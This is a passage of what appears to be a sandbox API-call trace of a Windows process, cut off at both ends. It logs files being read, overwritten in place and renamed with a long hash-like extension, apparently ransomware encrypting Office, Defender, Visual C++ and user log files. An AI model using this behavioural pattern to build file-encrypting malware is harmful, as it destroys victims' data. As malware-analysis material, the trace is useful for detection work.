lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat.B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat.B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29" [0104.794] GetProcessHeap () returned 0x600000 [0104.794] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x192) returned 0x63ff88 [0104.794] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x2c7ff60, FileInformation=0x63ff88, Length=0x192, FileInformationClass=0xa) returned 0x0 [0104.795] CloseHandle (hObject=0x314) returned 1 [0104.820] GetProcessHeap () returned 0x600000 [0104.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0104.821] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0104.826] WriteFile (in: hFile=0x318, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0104.827] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0104.940] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0104.942] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0104.942] WriteFile (in: hFile=0x30c, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0104.943] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0107.912] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x682408, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x682408, ReturnLength=0x2c7ff70) returned 0x0 [0107.912] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin", lpString2=".FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin.FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin.FF89EB2A750463235ACA5F84805AA0FD97F8D489E6388FAA8CB0F4770FE55E3D" [0107.912] GetProcessHeap () returned 0x600000 [0107.912] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x318e910 [0107.912] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x318e910, Length=0x186, FileInformationClass=0xa) returned 0x0 [0107.914] CloseHandle (hObject=0x310) returned 1 [0107.916] GetProcessHeap () returned 0x600000 [0107.916] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0107.918] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0107.926] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x2c7ff70) returned 0x0 [0107.927] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin", lpString2=".8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin.8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin.8434DBD73A6948FE33DBA00A9AE02277B9AD7A898CB48318541CFC111C5F785F" [0107.927] GetProcessHeap () returned 0x600000 [0107.927] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x318eaa8 [0107.927] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x2c7ff60, FileInformation=0x318eaa8, Length=0x186, FileInformationClass=0xa) returned 0x0 [0107.928] CloseHandle (hObject=0x30c) returned 1 [0107.931] GetProcessHeap () returned 0x600000 [0107.931] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0107.933] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0107.941] ReadFile (in: hFile=0x308, lpBuffer=0x315b140, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0107.941] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0107.941] WriteFile (in: hFile=0x308, lpBuffer=0x315b140, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 0x0 [0107.942] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.243] WriteFile (in: hFile=0x310, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0108.244] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.374] ReadFile (in: hFile=0x32c, lpBuffer=0x691480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x671348 | out: lpBuffer=0x691480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x671348) returned 1 [0108.375] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.378] WriteFile (in: hFile=0x32c, lpBuffer=0x691480, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x671348 | out: lpBuffer=0x691480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x671348) returned 0x0 [0108.382] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.383] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6713f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6713f8, ReturnLength=0x2c7ff70) returned 0x0 [0108.384] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.8396BADD3288D9FB15CEA45161384FC4D4DFA16042C2B7758A8A04D31CD3ED62" [0108.384] GetProcessHeap () returned 0x600000 [0108.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x6f03a0 [0108.384] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2c7ff60, FileInformation=0x6f03a0, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0108.385] CloseHandle (hObject=0x32c) returned 1 [0108.422] GetProcessHeap () returned 0x600000 [0108.422] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.424] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.426] ReadFile (in: hFile=0x304, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0108.426] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.427] WriteFile (in: hFile=0x304, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0108.427] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.428] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2c7ff70) returned 0x0 [0108.429] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436" [0108.429] GetProcessHeap () returned 0x600000 [0108.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1aa) returned 0x6f0550 [0108.429] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x2c7ff60, FileInformation=0x6f0550, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0108.433] CloseHandle (hObject=0x304) returned 1 [0108.556] GetProcessHeap () returned 0x600000 [0108.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0108.557] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.564] ReadFile (in: hFile=0x32c, lpBuffer=0x6a1488, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x681350 | out: lpBuffer=0x6a1488*, lpNumberOfBytesRead=0x0, lpOverlapped=0x681350) returned 1 [0108.636] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.772] ReadFile (in: hFile=0x304, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0108.772] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.773] WriteFile (in: hFile=0x304, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0108.774] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.776] WriteFile (in: hFile=0x310, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0108.810] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0108.811] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x2c7ff70) returned 0x0 [0108.811] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A" [0108.811] GetProcessHeap () returned 0x600000 [0108.811] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b2) returned 0x30f12d8 [0108.811] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x30f12d8, Length=0x1b2, FileInformationClass=0xa) returned 0x0 [0108.813] CloseHandle (hObject=0x310) returned 1 [0109.205] GetProcessHeap () returned 0x600000 [0109.205] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.206] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0109.288] ReadFile (in: hFile=0x310, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0109.288] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0109.289] WriteFile (in: hFile=0x310, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0109.290] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0109.291] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x2c7ff70) returned 0x0 [0109.291] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D" [0109.291] GetProcessHeap () returned 0x600000 [0109.291] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x6f29f8 [0109.292] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x6f29f8, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0109.293] CloseHandle (hObject=0x310) returned 1 [0109.317] GetProcessHeap () returned 0x600000 [0109.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.318] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0110.987] ReadFile (in: hFile=0x320, lpBuffer=0x680470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0110.987] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0110.987] WriteFile (in: hFile=0x320, lpBuffer=0x680470, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0110.988] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.007] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x2c7ff70) returned 0x0 [0111.007] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log", lpString2=".BC1F46AE79D3D85CCE7CDF85CBD0C51375A536C8D6494BA92F54B9A316D4BD53" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.BC1F46AE79D3D85CCE7CDF85CBD0C51375A536C8D6494BA92F54B9A316D4BD53") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log.BC1F46AE79D3D85CCE7CDF85CBD0C51375A536C8D6494BA92F54B9A316D4BD53" [0111.007] GetProcessHeap () returned 0x600000 [0111.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x164) returned 0x318bd80 [0111.008] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2c7ff60, FileInformation=0x318bd80, Length=0x164, FileInformationClass=0xa) returned 0x0 [0111.012] CloseHandle (hObject=0x320) returned 1 [0111.014] GetProcessHeap () returned 0x600000 [0111.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.016] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.116] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2c7ff70) returned 0x0 [0111.116] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", lpString2=".E72C710C8CCAD84AA1131A2A0332A4AC2B40040FD04ED6C7E3975781CDC4B94D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.E72C710C8CCAD84AA1131A2A0332A4AC2B40040FD04ED6C7E3975781CDC4B94D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.E72C710C8CCAD84AA1131A2A0332A4AC2B40040FD04ED6C7E3975781CDC4B94D" [0111.116] GetProcessHeap () returned 0x600000 [0111.116] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x154) returned 0x6f33c0 [0111.116] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2c7ff60, FileInformation=0x6f33c0, Length=0x154, FileInformationClass=0xa) returned 0x0 [0111.117] CloseHandle (hObject=0x32c) returned 1 [0111.121] GetProcessHeap () returned 0x600000 [0111.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.124] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.143] ReadFile (in: hFile=0x310, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.143] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0111.144] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x2c7ff70) returned 0x0 [0111.144] lstrcatW (in: 